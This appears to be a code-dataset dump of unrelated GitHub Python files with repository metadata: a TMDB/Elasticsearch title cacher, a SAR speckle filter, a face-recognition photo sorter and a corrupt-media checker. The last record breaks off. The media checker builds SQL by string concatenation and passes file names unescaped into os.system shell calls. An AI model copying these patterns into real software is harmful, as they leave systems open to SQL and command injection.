record["alias"].append(titleName["title"])
# Get images not not is avaliable
if "image" not in record:
record["image"] = ""
if title["original_language"] == self.config["exception_language"]:
params = {"language": title["original_language"]}
else:
params = {"language": self.config["main_language"]}
images = self.send_request_get(endPoint="{}/{}/images".format(self.config["title_type"], title["id"]), params=params)
if not images["posters"] and not images["backdrops"]:
# Try to search without any language for art
images = self.send_request_get(endPoint="{}/{}/images".format(self.config["title_type"], title["id"]), params={"language": ""})
imageAspectRatio = 10
for image in images["posters"] + images["backdrops"]:
if abs(image["aspect_ratio"] - self.config["image_aspect_ratio"]) < abs(imageAspectRatio - self.config["image_aspect_ratio"]):
record["image"] = image["file_path"][1:]
imageAspectRatio = abs(imageAspectRatio - self.config["image_aspect_ratio"])
# Get TMDB Record IDs
if "ids" not in record:
record["ids"] = {}
if "tmdb" not in record["ids"]:
record["ids"]["tmdb"] = title["id"]
self.index_record(index=self.config["title_index"], recordId=recordId, record=record)
else:
logging.debug("No update required for {} ({}) ({})".format(esRecord["hits"]["hits"][0]["_source"]["title"], esRecord["hits"]["hits"][0]["_source"]["year"], self.config["title_type"]))
return record
def search_title(self, search):
# First query elasticsearch and check if title is returned without any additional caching
result = self.query_title(search=search)
# If no title has been returned, search by director and actors
if not result or search.get("force"):
crew = search.get("director", []) + search.get("actor", []) + search.get("other", [])
for person in crew:
self.search_person_tmdb(person=person, year=search.get("year"), force=search.get("force"))
# Query again in elasticsearch and if match then break
result = self.query_title(search=search)
if result:
break
# If no result found, search by name and year if avaliable
if not result or search.get("force"):
if "title" in search:
for title in search["title"]:
self.search_title_tmdb(title=title, year=search.get("year"), force=search.get("force"))
result = self.query_title(search=search)
# Try an exact match if no result yet
if not result:
if "title" in search:
result = self.query_title_exact(search=search)
# Try adjacent years if provided year is not a hit. This is a workaround as the year supplied by some providers is inaccurate
if not result:
if search.get("year"):
for yearDiff in range(0, self.config["year_diff"] + 1):
final = False
if yearDiff == self.config["year_diff"]:
final = True
result = self.query_title(search=search, yearDiff=yearDiff, final=final)
if result:
break
else:
result = self.query_title(search=search, final=True)
if result:
logging.debug("Found {} ({}) in elasticsearch (Score: {:.1f})".format(result["_source"]["title"], self.config["title_type"], result["_score"]))
result = self.process_result(result=result, force=search.get("force"))
return result
def query_title_exact(self, search):
query = {"from": 0, "size": 1, "query": {}}
query["query"]["bool"] = {}
query["query"]["bool"]["should"] = []
if "title" in search:
for title in search["title"]:
query["query"]["bool"]["should"].append({"multi_match": {"query": title, "fields": ["title.keyword", "alias.keyword"]}})
result = self.get_record_by_query(index=self.config["title_index"], query=query)
if result["hits"]["total"]["value"] > 0:
if result["hits"]["hits"][0]["_score"] >= self.config["min_score_exact"]:
return result["hits"]["hits"][0]
def query_title(self, search, final=False, yearDiff=0):
query = {"from": 0, "size": 1, "query": {}}
query["query"]["bool"] = {}
query["query"]["bool"]["must"] = []
query["query"]["bool"]["should"] = []
if "title" in search:
for title in search["title"]:
query["query"]["bool"]["should"].append({"multi_match": {"query": title, "fields": ["title", "alias"]}})
if "director" in search:
for director in search["director"]:
query["query"]["bool"]["should"].append({"match": {"credits.director": director}})
if "actor" in search:
for actor in search["actor"]:
query["query"]["bool"]["should"].append({"match": {"credits.actor": actor}})
if "other" in search:
for producer in search["other"]:
query["query"]["bool"]["should"].append({"match": {"credits.other": producer}})
if "country" in search:
for country in search["country"]:
countryCode = self.countryCodes.get(country)
if countryCode:
query["query"]["bool"]["should"].append({"match": {"country": countryCode}})
if "year" in search:
search["year"] = int(search["year"])
year = {}
year["bool"] = {}
year["bool"]["should"] = []
year["bool"]["should"].append({"range": {"year": {"gte": search["year"] - yearDiff, "lte": search["year"] + yearDiff}}})
query["query"]["bool"]["must"].append(year)
# Calculate min score
if not final:
minScore = self.config["min_score_no_search"]
else:
minScore = self.config["min_score"]
if "actor" in search:
minScore += len(search["actor"] * self.config["score_increment_per_actor"])
result = self.get_record_by_query(index=self.config["title_index"], query=query)
if result["hits"]["total"]["value"] > 0:
if result["hits"]["hits"][0]["_score"] >= minScore:
return result["hits"]["hits"][0]
if final:
logging.debug("Best result {} (Score: {:.1f} Min Score: {})".format(result["hits"]["hits"][0]["_source"]["title"], result["hits"]["hits"][0]["_score"], minScore))
else:
if final:
logging.debug("No results found for {}".format(search["title"][0]))
def process_result(self, result, force):
# Check if record requires updating
title = {"id": result["_source"]["ids"]["tmdb"], "original_language": result["_source"]["language"]}
result["_source"] = self.cache_title(title=title, force=force, record=result)
# Generate full image URL if missing
result["_source"]["image"] = self.get_image_url(image=result["_source"]["image"])
# Convert country code to full name
countries = []
for countryCode in result["_source"]["country"]:
countries.append(self.countries.get(countryCode, "Unknown"))
result["_source"]["country"] = countries
# Convert language code to full name
result["_source"]["language"] = self.languages.get(result["_source"]["language"], "Unknown")
# Convert genre code
genres = []
for genreId in result["_source"]["genre"]:
genre = self.genres.get(genreId)
if genre:
genres.append(self.genres[genreId])
if genres:
result["_source"]["genre"] = genres
return result
def search_person_tmdb(self, person, year, force):
performSearch = force
recordId = None
# Check if search was already performed
query = {"query": {"bool": {"must": []}}}
query["query"]["bool"]["must"].append({"term": {"person": person}})
query["query"]["bool"]["must"].append({"term": {"year": year or -1}})
result = self.get_record_by_query(index=self.config["search_index"], query=query)
if result["hits"]["total"]["value"] == 0:
performSearch = True
else:
# Check if person is up for an update:
if self.check_update_required(timestamp=result["hits"]["hits"][0]["_source"]["@timestamp"]):
performSearch = True
recordId = result["hits"]["hits"][0]["_id"]
if performSearch:
# Query TMDB for person
params = {"include_adult": "false", "page": 1}
params["query"] = person
logging.info("Searching for person : {}".format(person))
response = self.send_request_get("search/person", params=params)
if "total_results" in response:
if response["total_results"] > 0:
for personRecord in response["results"]:
# Search credits of person found
logging.info("Getting credits : {} ({}) ({})".format(personRecord["name"], year, self.config["title_type"]))
credits = self.send_request_get("person/{}/{}_credits".format(personRecord["id"], self.config["title_type"]))
# Find titles during years around query or if year=-1 all credits
if "crew" in credits:
for credit in credits["crew"] + credits["cast"]:
if "release_date" in credit and year:
if credit["release_date"] != '' and credit["release_date"]:
creditYear = int(credit["release_date"][:4])
if abs(year - creditYear) > self.config["year_diff"]:
continue
self.cache_title(title=credit, force=force, record={})
# Save that name and year to avoid doing the same search again
record = {}
record["person"] = person
record["year"] = year or -1
self.index_record(index=self.config["search_index"], record=record, recordId=recordId)
else:
logging.debug("Already searched credits for {} ({}) ({})".format(person, year, self.config["title_type"]))
def search_title_tmdb(self, title, year, force):
performSearch = force
recordId = None
# Check if search was already performed
query = {"query": {"bool": {"must": []}}}
query["query"]["bool"]["must"].append({"term": {"title": title}})
query["query"]["bool"]["must"].append({"term": {"year": year or -1}})
result = self.get_record_by_query(index=self.config["search_index"], query=query)
if result["hits"]["total"]["value"] == 0:
performSearch = True
else:
# Check if person is up for an update:
if self.check_update_required(timestamp=result["hits"]["hits"][0]["_source"]["@timestamp"]):
performSearch = True
recordId = result["hits"]["hits"][0]["_id"]
if performSearch:
params = {"include_adult": "false", "page": 1}
params["query"] = title
if year:
params["year"] = year
logging.info("Searching for title : {} ({}) ({})".format(title, year, self.config["title_type"]))
response = self.send_request_get(endPoint="search/{}".format(self.config["title_type"]), params=params)
if "total_results" in response:
if response["total_results"] > 0:
for result in response["results"][:5]:
self.cache_title(title=result, force=force, record={})
# Save title and year to avoid doing the same search again
record = {}
record["title"] = title
record["year"] = year or -1
self.index_record(index=self.config["search_index"], record=record, recordId=recordId)
else:
logging.debug("Already searched title {} ({}) ({})".format(title, year, self.config["title_type"]))
def get_image_url(self, image):
if "http" not in image:
return "{}/{}".format(self.config["image_base_url"], image)
else:
return image
def check_for_dup(self, title, alias, orgTitle=""):
if title == "":
return False
if alias:
for altTitle in alias + [orgTitle]:
if re.search("^{}$".format(re.escape(title)), altTitle, flags=re.IGNORECASE):
return False
else:
return True
if orgTitle:
if re.search("^{}$".format(re.escape(title)), orgTitle, flags=re.IGNORECASE):
return False
return True
def render_template(self, record, template):
if template == "description":
return self.description_template.render(record=record)
elif template == "subtitle":
return self.subtitle_template.render(record=record)
def check_index(self, indexName, indexMappingFile):
if not self.es.indices.exists(index=indexName):
with open(os.path.join(os.path.dirname(__file__), "index_mapping", indexMappingFile), "r") as mappingFile:
indexSettings = mappingFile.read()
response = self.es.indices.create(index=indexName, body=indexSettings)
if response["acknowledged"]:
logging.info("Created {} index".format(indexName))
def get_record_by_query(self, index, query, refreshIndex=True):
if refreshIndex:
self.es.indices.refresh(index=index)
return self.es.search(index=index, body=query)
def index_record(self, index, record, recordId=None):
record["@timestamp"] = datetime.datetime.utcnow().isoformat()
self.es.index(index=index, id=recordId, body=record)
def check_update_required(self, timestamp):
timestamp = datetime.datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%S.%f")
if timestamp < datetime.datetime.utcnow() - datetime.timedelta(days=self.config["refresh_after_days"]) or timestamp <= self.config["refresh_if_older"]:
return True
else:
return False
def cache_configuration(self):
self.genres = {}
self.countries = {}
self.countryCodes = {}
self.languages = {}
genres = self.send_request_get(endPoint="genre/{}/list".format(self.config["title_type"]))
if genres:
for genre in genres["genres"]:
self.genres[genre["id"]] = genre["name"]
countries = self.send_request_get(endPoint="configuration/countries")
if countries:
for country in countries:
self.countries[country["iso_3166_1"]] = country["english_name"]
self.countryCodes[country["english_name"]] = country["iso_3166_1"]
languages = self.send_request_get(endPoint="configuration/languages")
if languages:
for language in languages:
self.languages[language["iso_639_1"]] = language["english_name"]
backgroundUrl = self.send_request_get(endPoint="configuration")
if backgroundUrl:
self.config["image_base_url"] = backgroundUrl["images"]["base_url"]
self.config["image_base_url"] += self.config["tmdb_image_type"]
| shaunschembri/ElasticTMDB | elastictmdb/__init__.py | __init__.py | py | 27,602 | python | en | code | 4 | github-code | 6 | [
{
"api_name": "config.set_defaults",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "logging.WARNING",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "logging.ge... |
659465820 |
import numpy as np
from tqdm import tqdm
from statistics import median
class Filter :
"""
To add :
- Filtre de Frost, Filtre de Gamma_MAP, Kuan
- Autoencoder filtering ?
"""
#class specialized for filtering SAR images formated as (height, len, (HH,HV,VV))
def __init__(self, img : np.ndarray , kernel_size : tuple[int,int]) -> None:
#kernel_size is the window on which we will apply our filter, example :
# if kernel_size == (3,3) then the mean will be computed on its direct neighbours in a 3x3 square.
self.original_img = img
self.kernel_size = kernel_size
self.height, self.length, self.dim = img.shape
self.k_height, self.k_length = kernel_size[0], kernel_size[1]
self.filtered_img = np.zeros_like(self.original_img)
def apply_average_filter(self):
img = self.original_img
filtered_img = np.zeros(img.shape, dtype = np.complex128)
height, length, dim = img.shape
k_height, k_length = self.kernel_size[0], self.kernel_size[1]
filtered_img = np.zeros_like(img)
for i in range(height) :
for j in range(length) :
top = max(0, i - k_height//2)
bottom = min(height, i + k_height//2 + 1)
left = max(0, j-k_length//2)
right = min(length, j + k_length//2 + 1)
filtered_img[i,j] = np.mean(img[top:bottom, left:right, :], axis = (0,1), dtype = complex)
self.filtered_img = filtered_img
def apply_median_filter(self) :
#this methods applies the median on each real part, imaginary part of each component HH, HV, VV.
for i in range(self.height) :
for k in range(self.length) :
top = max(0, i - self.k_height // 2 )
bottom = min(self.height, i + self.k_height // 2 + 1)
left = max(0, k - self.k_length // 2)
right = min(self.length, k + self.k_length // 2 + 1)
for d in range(self.dim) :
self.filtered_img[i, k, d] = median(np.real(self.original_img[top : bottom, left : right, d].reshape(-1))) + median(np.imag(self.original_img[top : bottom, left : right, d].reshape(-1))) * complex(real = 0, imag = 1)
def apply_lee_filter(self,sigma_v = 1.15):
"""
Applique le filtre de Lee à l'image SAR polarimetrique.
Le résultat apparaît dans la variable self.filtered_img
var_y est calculé localement pour chaque pixel selon l'article de Lee : Polarimetric SAR Speckle Filtering And Its Implication For Classification
Args:
sigma_v est un nombre arbitrairement choisi qui représente l'écart type du speckle, bruit que l'on cherche à filtrer
"""
img = self.original_img
size = self.k_height
img_mean = np.mean(img, axis = (0,1))
var_y = np.zeros_like(img)
var_x = np.zeros_like(img)
b = np.zeros_like(img)
for d in range(self.dim) :
for i in tqdm(range(self.height)) :
for j in range(self.length) :
top = max(0, i - self.k_height//2 )
bottom = min(self.height, i + self.k_height//2 + 1)
left = max(0, j - self.k_length//2)
right = min(self.length, j + self.k_length//2 + 1)
var_y[i,j,d] = np.mean(self.squared_norm(img[top:bottom, left: right,d]), axis = (0,1))-self.squared_norm(np.mean(img[top:bottom, left: right,d], axis = (0,1)))
var_x[i,j,d] = (var_y[i,j,d] - img_mean[d]*img_mean[d]*sigma_v*sigma_v)/(1+sigma_v*sigma_v)
if var_x[i,j,d] < 0 :
var_x[i,j,d] = 0
b[i,j,d] = var_x[i,j,d]/var_y[i,j,d]
self.filtered_img[i,j,d] = img_mean[d] + b[i,j,d] * (img[i,j,d] - img_mean[d])
return self.filtered_img
def squared_norm(self, c : complex) :
a = np.real(c)
b = np.imag(c)
return a*a + b*b
"""
Kuan and Frost filter are to be implemented
""" | ArnaudMi/Statistical-Learning-Methods-Contribution-for-the-description-of-SAR-targets | code/utils/filtre.py | filtre.py | py | 4,147 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "numpy.ndarray",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "numpy.zeros_like",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "numpy.complex128",
... |
3806456362 | import pickle, custom_logger
from cmd_parser import parser, createModelString, performSortingString
from asyncio.log import logger
from os.path import isfile
from logging import INFO, DEBUG, WARN
import utils
import logging
args = parser.parse_args()
if args.debug:
custom_logger.initialize_logger(logger_level=DEBUG)
else:
custom_logger.initialize_logger(logger_level=INFO)
if args.mode == createModelString:
if args.name == None:
raise Exception(
"Please provide your name to save your face model with -n or --name"
)
if args.input_type == "image":
actual_images, not_images = utils.get_images_from_folder(args.input_folder)
logging.info(
"Images found in folder (These will be scanned) : {}".format(actual_images)
)
logging.info("Non-Images found in folder : {}".format(not_images))
if len(actual_images) == 0:
raise Exception("No suitable images found in folder provided")
logging.info("Tests passed, starting scan now")
import recognition_engine
actual_images = utils.join_path_list(args.input_folder, actual_images)
encodings = recognition_engine.train_from_images(
actual_images, debug=args.debug
)
logging.debug(encodings)
with open("{}.pkl".format(args.name), "wb") as f:
pickle.dump(encodings, f)
logging.info("Khatam!")
elif args.input_type == "video":
if args.input_file == None:
raise Exception("Please provide a video input file with -i or --input_file")
if not isfile(args.input_file):
raise Exception(
"'{}' is not a valid file. Please provide a valid file".format(
args.input_file
)
)
import recognition_engine
encodings = recognition_engine.train_from_video(
video_path=args.input_file, debug=args.debug
)
with open("{}.pkl".format(args.name), "wb") as f:
pickle.dump(encodings, f)
logging.info("Khatam!")
else:
raise Exception("You need to specify input type with -t or --input_type")
elif args.mode == performSortingString:
if args.name == None:
raise Exception(
"Please provide the name you gave while creating the model with -n or --name"
)
utils.verify_folder(args.input_folder)
images_to_sort, not_to_sort = utils.get_images_from_folder(args.input_folder)
final_paths = utils.join_path_list(args.input_folder, images_to_sort)
encodings = None
try:
with open("{}.pkl".format(args.name), "rb") as f:
encodings = pickle.load(f)
except Exception as E:
logger.critical(E)
exit(1)
found_directory = "found_directory"
not_found_directory = "not_found_directory"
utils.verify_folder(folder_path=found_directory, create=True)
utils.verify_folder(folder_path=not_found_directory, create=True)
threading = False if args.processes == 1 else True
import recognition_engine
recognition_engine.sort_into_directories(
images_to_test=final_paths,
perform_transfer=True,
debug=args.debug,
verbose=True,
threading=False,
target_encodings=encodings,
n_workers=args.processes,
)
logging.info("Khatam!")
logging.info("Ruko zara, sabar kato")
| jmvaswani/picture-sorter | sorter.py | sorter.py | py | 3,435 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "cmd_parser.parser.parse_args",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "cmd_parser.parser",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "custom_logger.initialize_logger",
"line_number": 13,
"usage_type": "call"
},
{
"ap... |
22713126804 | import os
import sys
from os import listdir
from PIL import Image
import mysql.connector as database
#Environment variables / default values
DB_HOST = os.getenv('DB_HOST','localhost')
DB_USER = os.getenv('DB_USER','root')
DB_PASSWORT = os.getenv('DB_PASSWORT','secret')
FILE_PATH = os.getenv('FILE_PATH','files')
patharray = [FILE_PATH+"/folder1",FILE_PATH+"/folder2",FILE_PATH+"/folder3",FILE_PATH+"/folder4"]
# Connect to MariaDB Platform
try:
connection = database.connect(
user=DB_USER,
password=DB_PASSWORT,
host=DB_HOST,
database="testdatabase"
)
except database.Error as e:
print("Error connecting to MariaDB Platform: {e}")
sys.exit(1)
def Is_id_checked(id):
print("Check flag for Upload " + id)
statement = "SELECT uploadid, filechecked FROM uploads WHERE uploadid=" + id
cursor = connection.cursor()
cursor.execute(statement)
for (uploadid) in cursor:
return uploadid[1]
def Set_id_checked(id):
print("Upload " + id + " is checked. Update flag")
statement = "UPDATE uploads SET filechecked = 1 WHERE uploadid = " + id
cursor = connection.cursor()
cursor.execute(statement)
connection.commit();
def check_all():
for path in patharray:
for filename in listdir(path):
if(filename=="corrupt"):
break
if(Is_id_checked(filename[:-4]) == 0):
imagepath = path + '/' + filename
if filename.endswith('.gif') or filename.endswith('.png') or filename.endswith('.jpg'):
try:
img = Image.open(imagepath)
img.verify()
Set_id_checked(filename[:-4])
except (IOError, SyntaxError) as e:
print('Bad file:', imagepath)
#os.remove(imagepath)
os.replace(path + '/' + filename, path + '/' + "corrupt/" + filename)
if filename.endswith('.mp4'):
result = os.system("ffmpeg -v error -i " + imagepath + ' -f null ' + './' + filename + ' >/dev/null 2>&1')
if result != 0:
print('Bad file:', imagepath)
##os.remove(imagepath)
os.replace(path + '/' + filename, path + '/' + "corrupt/" + filename)
else:
Set_id_checked(filename[:-4])
check_all()
| AnSieger/find_corrupt_media_files | checkimages.py | checkimages.py | py | 2,239 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "os.getenv",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 11,
"u... |
22189104094 | import numpy as np
import cv2 as cv
capture = cv.VideoCapture(0)
lastNorm = 0.0
lastCounter = 0
counter = 0
currentState = 0
onList = []
offList = []
onDuration = 0
offDuration = 0
if not capture.isOpened():
print("Cannot open camera")
exit()
while True:
# Capture frame-by-frame
ret, frame = capture.read()
gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
hsv = cv.cvtColor(frame,cv.COLOR_BGR2HSV)
currentNorm = np.linalg.norm(frame)
diffNorm = currentNorm - lastNorm
#print("currentNorm " ,currentNorm)
#print("diffNorm " ,diffNorm)
if (diffNorm > 20000 and currentState == 0):
currentState = 1;
print( "on - was off for " , (counter - lastCounter ), " frames and " , ((counter - lastCounter)/30) ," seconds" )
offDuration = (counter - lastCounter)/30
offList.append(offDuration)
#for v in offList:
# print(v + " ")
lastCounter = counter
if (diffNorm < -20000 and currentState == 1):
currentState = 0
print("off - was on for " ,counter - lastCounter , " frames and " , (counter - lastCounter)/30 , " seconds" )
onDuration = (counter - lastCounter)/30
onList.append(onDuration)
#for v in onList:
# print( v + " " )
lastCounter = counter
lastNorm = currentNorm
counter += 1
# Display the resulting frame
cv.imshow('frame', gray)
if cv.waitKey(1) == ord('q'):
break
# When everything done, release the capture
capture.release()
cv.destroyAllWindows()
| musaceylan/handy_codes | on_off_detector.py | on_off_detector.py | py | 1,577 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "cv2.VideoCapture",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2GRAY",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "cv2.cvtColor",
... |
18245658241 | import pandas as pd
import dataprofiler as dp
import numpy as np
from pymongo import MongoClient
try:
conn = MongoClient()
except:
print("Could not connct to Mongo DB")
db = conn.database
collection = db.my_gfg_collection
data = {
"calories": [420,380, 390,390, 80, 350],
"duration": [50,45,40,40,np.nan ,50]
}
target_df = pd.DataFrame(data)
profile = dp.Profiler(target_df)
report = profile.report(report_options={"output_format":"pretty"})
data_stats = report["data_stats"]
collection.insert_one(data_stats)
column_list_df = []
ext_data = []
for n in data_stats:
column_list = list(n.keys())
for col_name in column_list:
if col_name not in column_list_df:
column_list_df.append(col_name)
else:
continue
ext_data.append(list(n.values()))
data = pd.DataFrame(ext_data,columns=column_list_df)
stats_df=pd.DataFrame.from_records(data.statistics.dropna().tolist())
sum_df = pd.concat([data, stats_df], axis=1)
data_stats = report["global_stats"]
print(data_stats)
print(sum_df)
| arbecker620/DataQuality | DataQuality.py | DataQuality.py | py | 1,082 | python | en | code | 2 | github-code | 6 | [
{
"api_name": "pymongo.MongoClient",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.nan",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "dataprofiler.Prof... |
12731828005 | #Visualizing data with Matplotlib
#Matplotlib config
#import matplotlib as mpl
#mpl.rcParams['lines.linewidth'] = 2
#mpl.rcParams['lines.color'] = 'r'
#plt.rcParams['figure.figsize'] = (8,4)
#plt.gcf().set_size_inches(8,4)
#example 1
import numpy as np
import pandas as pd
from datetime import date
import matplotlib.pyplot as plt
hoy = date.today()
x = pd.period_range(hoy,periods=200,freq='d')
x = x.to_timestamp().to_pydatetime()
y = np.random.randn(200,3).cumsum(0)
#three plots in one figure
'''
plots = plt.plot(x,y)
plt.legend(plots,('foo','bar','mongo'),loc='best',
framealpha=0.25,prop={'size':'small','family':'monospace'})
plt.gcf().set_size_inches(8,4)
plt.title('Random Trends')
plt.xlabel('Date')
plt.ylabel('Cummulative sum')
plt.grid(True)
plt.figtext(0.995,0.01,'\u00a9 Acme designs 2020',ha='right',va='bottom')
plt.tight_layout()
plt.savefig('mpl_3lines_custom.svg')
'''
# a plot insert with figure.axes
'''
fig = plt.figure(figsize=(8,4))
#Main axes
ax = fig.add_axes([0.1,0.1,0.8,0.8])
ax.set_title('Main axes with insert child axes')
ax.plot(x,y[:,0])#selects the 1st col of numpy rand y-data
ax.set_xlabel('Date')
ax.set_ylabel('Cummulative Sum')
# inserted axes
ax = fig.add_axes([0.15,0.15,0.3,0.3])
ax.plot(x,y[:,1],color='g')
ax.set_xticks([]);#removes the xticks of subplot
plt.savefig('subplots.png')
'''
# another subplot
fig, axes = plt.subplots(nrows=3,ncols=1,sharex=True,sharey=True,figsize=(8,8))
labelled_data = zip(y.transpose(),('foo','bar','mongo'),('b','g','r'))
fig.suptitle('3 random trends',fontsize=16)
for i, ld in enumerate(labelled_data):
ax = axes[i]
ax.plot(x, ld[0], label=ld[1], color=ld[2])
ax.set_ylabel('Cummulative sum')
ax.legend(loc='upper left',framealpha=0.5,prop={'size':'small'})
ax.grid(True)
axes[-1].set_xlabel('Date')
fig.text(0.995,0.01,'\u00a9 Acme designs 2020',ha='right',va='bottom')
fig.tight_layout()
print('Today is',hoy)
plt.savefig('3rand_subplots.png')
| ndlopez/learn_python | source/plot_test.py | plot_test.py | py | 1,965 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "datetime.date.today",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "datetime.date",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "pandas.period_range",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.random.ra... |
7924878639 | from tools import adaptive, parse
import numpy as np
from imutils import resize
import matplotlib
import matplotlib.pyplot as plt
import cv2 as cv
import argparse
matplotlib.use('TKAgg')
PATH = "images/adaptive/{}"
function_map = {
'mean': adaptive.threshold_mean,
'median': adaptive.threshold_median
}
parser = argparse.ArgumentParser()
parser.add_argument('--filepath', '-f',
type=str, help=parse.HELP_FILEPATH)
parser.add_argument('--block_size', '-w', default=(3, 3),
type=parse.tuple_type, help=parse.HELP_WINDOW)
parser.add_argument('--function', '-fc', default='mean',
type=str, help=parse.HELP_FUNCTION, choices=function_map.keys())
parser.add_argument('--resize_width', '-rsz', default=400,
type=int, help=parse.HELP_RSZ)
parser.add_argument('--save_filename', '-svf', default=None,
type=str, help=parse.HELP_SAVE)
matplotlib.use('TKAgg')
if __name__ == '__main__':
args = parser.parse_args()
image = cv.imread(args.filepath, 0)
image = resize(image, args.resize_width)
adaptive_thresh = adaptive.adaptive_threshold(image, args.block_size, function_map[args.function])
filename = args.save_filename
if not args.save_filename:
filename = "{}_adaptive_block_{}_{}x{}.png"
filename = filename.format(
args.filepath.split("/")[-1].split(".")[0], args.function,
args.block_size[0], args.block_size[1]
)
cv.imwrite(PATH.format(filename), adaptive_thresh)
fig, ax = plt.subplots(1, 2)
ax[0].imshow(image, cmap='gray')
ax[1].imshow(adaptive_thresh, cmap='gray')
plt.show() | YvesAugusto/project_vc | adaptive.py | adaptive.py | py | 1,682 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "matplotlib.use",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "tools.adaptive.threshold_mean",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "tools.adaptive",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "tools... |
17891204899 | from typing import List
from game.GameState import GameState, Move
from policy.Policy import EstimatingPolicy
from policy.exceptions import *
import random
import numpy.random
import torch
import torch.cuda
class ModelBasedPolicy(EstimatingPolicy):
def __init__(self, model, feature_extractor, h, w, exploration=0, cuda = False):
self.model = model
self.h = h
self.w = w
self.exploration = exploration
self.feature_extractor = feature_extractor
self.name = model.name
self.cuda = cuda
def get_next_state_values(self, game_state: GameState):
available_moves, next_states = self.get_next_states(game_state)
with torch.no_grad():
features_for_all_states = self.feature_extractor.get_features(next_states).float()
if self.cuda:
features_for_all_states = features_for_all_states.cuda()
v: torch.Tensor = self.model.forward(features_for_all_states)
return available_moves, next_states, v
def get_next_states(self, game_state):
available_moves: List[Move] = list(game_state.get_all_moves())
if not available_moves:
raise NoValidMovesException(game_state.to_move, 'No move for {}'.format(game_state.to_move))
next_states = [game_state.get_copy_with_move(move) for move in available_moves]
return available_moves, next_states
def get_best_option(self, game_state: GameState):
available_moves, next_states, v = self.get_next_state_values(game_state)
self.pos_checked = len(next_states)
if self.exploration:
if random.random() < self.exploration:
v.squeeze_(1)
v = v.numpy()
v += abs(v.min())
v /= v.sum()
i = numpy.random.choice(range(len(available_moves)), p=v)
return v[i], available_moves[i]
# we minimize quality of position for moving player (opponent) prediction of the net for next state.
best_move_value, best_move_index = v.min(0)
# print(best_move_value)
return best_move_value, available_moves[int(best_move_index)]
| nkorobkov/virus-game | policy/ModelBasedPolicy.py | ModelBasedPolicy.py | py | 2,183 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "policy.Policy.EstimatingPolicy",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "game.GameState.GameState",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "torch.no_grad",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": ... |
18231210208 | import pandas as pd
from astropy.coordinates import SkyCoord
from astropy import units as u
import glob
import concurrent.futures
# Read in catalog data
catalog = pd.read_csv('observations.txt', delimiter=' ')
master_catalog = pd.read_csv('master_catalog_jan_2023.csv', delimiter=',')
print(master_catalog)
print('Starting loop...')
# Define a function to process a single field
def process_field(index):
global master_catalog, catalog, field_data, master_catalog_coords, catalog_coord
idx, d2d, _ = master_catalog_coords[index].match_to_catalog_sky(catalog_coord)
# Get the field ID and check if the corresponding file exists
field_id = catalog.loc[idx]['FieldID']
file_path = f'cleaned_half/c{field_id}p.ascd'
if not glob.glob(file_path):
print(f'Error: File not found for FieldID {field_id}')
return
# Read in file data
if field_id not in field_data:
field_data[field_id] = pd.read_csv(file_path, delimiter=' ')
file_data = field_data[field_id]
print('+=================+')
print('Processing : ', field_id, '(', index, ' / ', total, ')')
file_coords = SkyCoord(ra=file_data['RA'], dec=file_data['Dec'], unit=(u.hourangle, u.deg))
idx, _, _ = master_catalog_coords[index].match_to_catalog_sky(file_coords)
i_value = file_data.loc[idx, 'i']
g_value = file_data.loc[idx, 'g']
# Add i and g values to catalog
master_catalog.at[index, 'i'] = i_value
master_catalog.at[index, 'g'] = g_value
print('Coords Processed')
# Loop over unique FieldIDs
counter = 0
master_catalog_coords = SkyCoord(ra=master_catalog['RADEG'], dec=master_catalog['DECDEG'], unit=(u.deg, u.deg))
total = len(master_catalog_coords)
ra_deg = (catalog['RAh']) * 15 + (catalog['RAm']) * 0.25 + (catalog['RAs']) * 0.00416667
dec_deg = (catalog['DEd']) + ((catalog['DEm']) / 60) + ((catalog['DEs']) / 3600)
catalog_coord = SkyCoord(ra=ra_deg * u.deg, dec=dec_deg * u.deg)
field_data = {}
# Define the number of threads to use
num_threads = 8
# Process the fields using multiple threads
with concurrent.futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
futures = []
for index in range(total):
future = executor.submit(process_field, index)
futures.append(future)
concurrent.futures.wait(futures)
# Write out updated catalog
print('Outputting to csv')
master_catalog.to_csv('cleaned_half/master_updated.csv', index=False)
print('Done!')
| WilliamOrringe/Indentifying-Candidate-Star-Clusters-in-M31 | multi.py | multi.py | py | 2,519 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "pandas.read_csv",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "glob.glob",
